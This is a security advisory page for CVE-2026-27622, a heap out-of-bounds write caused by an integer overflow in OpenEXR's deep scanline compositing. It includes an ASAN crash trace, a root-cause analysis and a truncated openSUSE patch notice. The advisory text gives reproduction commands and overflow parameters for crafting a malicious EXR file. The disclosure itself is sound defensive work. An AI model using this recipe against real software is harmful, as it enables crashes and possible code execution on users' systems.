Reader ASAN crash:
❯ ./build-asan/poc/simple_exr_reader
reading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts
=================================================================
==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670
WRITE of size 4 at 0x7ed1a55d90b0 thread T0
#0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374
#1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664
#2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816
#3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568
#4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576
#5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88
#6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360
#8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)
0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)
allocated by thread T0 here:
#0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
#1 0x7ed1dbc29600 in std::__new_allocator<float>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151
#2 0x7ed1dbc29600 in std::allocator_traits<std::allocator<float> >::allocate(std::allocator<float>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482
#3 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381
#4 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378
#5 0x7ed1dbc29600 in std::vector<float, std::allocator<float> >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663
#6 0x7ed1dbc00184 in std::vector<float, std::allocator<float> >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016
#7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535
#8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88
#9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360
#11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers
Shadow bytes around the buggy address:
0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa
0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==175024==ABORTING
Root cause analysis
In CompositeDeepScanLine::readPixels:
- Per-pixel totals are accumulated in
vector<unsigned int> total_sizes. - For attacker-controlled large counts across many parts,
total_sizes[ptr]wraps modulo2^32. overall_sample_countis then derived from wrapped totals and used insamples[channel].resize(overall_sample_count).- Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (
generic_unpack_deep_pointers) overrun the undersized composite sample buffer.
Allocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.
Impact
Heap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.
Severity
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "3.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "OpenEXR"
},
"ranges": [
{
"events": [
{
"introduced": "3.4.0"
},
{
"fixed": "3.4.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27622"
],
"database_specific": {
"cwe_ids": [
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T18:30:20Z",
"nvd_published_at": "2026-03-03T23:15:55Z",
"severity": "HIGH"
},
"details": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . -B build-asan \\\n -DOPENEXR_BUILD_POC=ON \\\n -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n -DCMAKE_C_FLAGS=\u0027-fsanitize=address,undefined -fno-omit-frame-pointer\u0027 \\\n -DCMAKE_CXX_FLAGS=\u0027-fsanitize=address,undefined -fno-omit-frame-pointer\u0027 \\\n -DCMAKE_EXE_LINKER_FLAGS=\u0027-fsanitize=address,undefined\u0027 \\\n -DCMAKE_SHARED_LINKER_FLAGS=\u0027-fsanitize=address,undefined\u0027\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n ./build-asan/poc/composite_writer \\\n --profile low-ram \\\n --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n\u276f ./build-asan/poc/composite_writer\nexploit math:\n benign samples : 300\n malicious parts : 86\n malicious samples per part : 50000000\n true total samples : 4300000300\n uint32 overflow reached : yes\n wrapped uint32 total : 5033004\n composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)\n per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n\u276f ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const\u0026, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n #1 0x7ed1dbc29600 in std::__new_allocator\u003cfloat\u003e::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n #2 0x7ed1dbc29600 in std::allocator_traits\u003cstd::allocator\u003cfloat\u003e \u003e::allocate(std::allocator\u003cfloat\u003e\u0026, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n #3 0x7ed1dbc29600 in std::_Vector_base\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n #4 0x7ed1dbc29600 in std::_Vector_base\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n #5 0x7ed1dbc29600 in std::vector\u003cfloat, std::allocator\u003cfloat\u003e \u003e::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n #6 0x7ed1dbc00184 in std::vector\u003cfloat, std::allocator\u003cfloat\u003e \u003e::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n 0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=\u003e0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector\u003cunsigned int\u003e total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.",
"id": "GHSA-cr4v-6jm6-4963",
"modified": "2026-03-04T02:00:10Z",
"published": "2026-03-02T18:30:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"type": "PACKAGE",
"url": "https://github.com/AcademySoftwareFoundation/openexr"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenEXR\u0027s CompositeDeepScanLine integer-overflow leads to heap OOB write"
}
OPENSUSE-SU-2026:10303-1
Vulnerability from csaf_opensuse - Published: 2026-03-07 00:00 - Updated: 2026-03-07 00:00Summary
libIex-3_4-33-3.4.6-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: libIex-3_4-33-3.4.6-1.1 on GA media
Description of the patch: These are all security issues fixed in the libIex-3_4-33-3.4.6-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10303
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
72 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-devel-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:openexr-doc-3.4.6-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "libIex-3_4-33-3.4.6-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the libIex-3_4-33-3.4.6-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10303",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10303-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27622 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27622/"
}
],
"title": "libIex-3_4-33-3.4.6-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-07T00:00:00Z",
"generator": {
"date": "2026-03-07T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10303-1",
"initial_release_date": "2026-03-07T00:00:00Z",
"revision_history": [
{
"date": "2026-03-07T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
